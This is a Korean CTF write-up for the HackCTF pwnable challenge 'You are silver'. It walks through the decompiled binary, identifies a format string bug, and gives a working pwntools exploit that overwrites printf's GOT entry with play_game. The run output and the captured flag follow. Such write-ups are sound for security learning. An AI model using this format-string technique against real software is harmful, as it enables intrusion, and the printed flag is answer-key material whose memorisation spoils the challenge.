[HackCTF / pwnable] You are silver
2019. 10. 19. 07:25ㆍWargame & CTF/HackCTF
Summery
64bit
Analysis
main
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s; // [rsp+0h] [rbp-30h]
int v5; // [rsp+28h] [rbp-8h]
unsigned int v6; // [rsp+2Ch] [rbp-4h]
setvbuf(stdout, 0LL, 2, 0LL);
v6 = 50;
puts("Please enter your name");
fgets(&s, 46, stdin);
printf(&s, 46LL);
v5 = get_tier(v6);
printf((const char *)v5);
return 0;
}get_tier
signed __int64 __fastcall get_tier(signed int a1)
{
signed __int64 result; // rax
if ( a1 > 50 )
{
if ( a1 > 65 || a1 <= 50 )
{
if ( a1 > 75 || a1 <= 65 )
{
if ( a1 > 75 )
{
puts("\nYou are challenger.");
result = 4LL;
}
}
else
{
puts("\nYou are master.");
result = 3LL;
}
}
else
{
puts("\nYou are platinum.");
result = 2LL;
}
}
else
{
puts("\nYou are silver.");
result = 1LL;
}
return result;
}play_game
void __fastcall __noreturn play_game(signed int a1)
{
if ( a1 != 2 )
{
if ( a1 > 2 )
{
if ( a1 == 3 )
{
puts("master can't play game. Sorry! :(");
exit(0);
}
if ( a1 == 4 )
{
puts("Challenger. Take this first!");
system("cat ./flag");
}
}
else if ( a1 == 1 )
{
puts("SILVER can't play game.");
exit(0);
}
puts("Who are you? get out!");
exit(0);
}
puts("platinum can't play game. :(");
exit(0);
}포멧스트링 버그가 생긴다.
get_tier에서 숫자를 받아서 printf로 넘긴다.
포멧스트링버그로 printf를 play_game으로 바꿔주고 fgets로 46자를 받기때문에 v6를 2바이트 덮어씌울수있다.
2바이트 덮어씌워서 v6를 75 초과로 만들면 플래그가 뜰것이다.
Exploit
from pwn import *
e = ELF("./you_are_silver")
libc = e.libc
#p = process("./you_are_silver")
p = remote("ctf.j0n9hyun.xyz", 3022)
p.recvuntil("Please enter your name\n")
payload = ""
payload += "%" + str(e.symbols["play_game"]) + "x"
payload += "%8$ln"
payload += "AA"
payload += p64(e.got["printf"])
payload += "z"*(46-len(payload))
p.send(payload)
p.recvuntil("You are challenger.")
p.interactive()Flag
cg10036@cg10036-virtual-machine:~/hackCTF/You_are_silver$ p ex.py
[*] '/home/cg10036/hackCTF/You_are_silver/you_are_silver'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] '/lib/x86_64-linux-gnu/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to ctf.j0n9hyun.xyz on port 3022: Done
[*] Switching to interactive mode
Challenger. Take this first!
HackCTF{N0w_Y0u_4re_b4side_0f_F4K3R}
Who are you? get out!'Wargame & CTF > HackCTF' 카테고리의 다른 글
| [HackCTF / pwnable] SysROP (0) | 2019.10.28 |
|---|---|
| [HackCTF / pwnable] RTC (0) | 2019.10.22 |
| [HackCTF / pwnable] Unexploitable #1 (0) | 2019.10.18 |
| [HackCTF / pwnable] ROP (0) | 2019.10.18 |
| [HackCTF / pwnable] Pwning (0) | 2019.10.18 |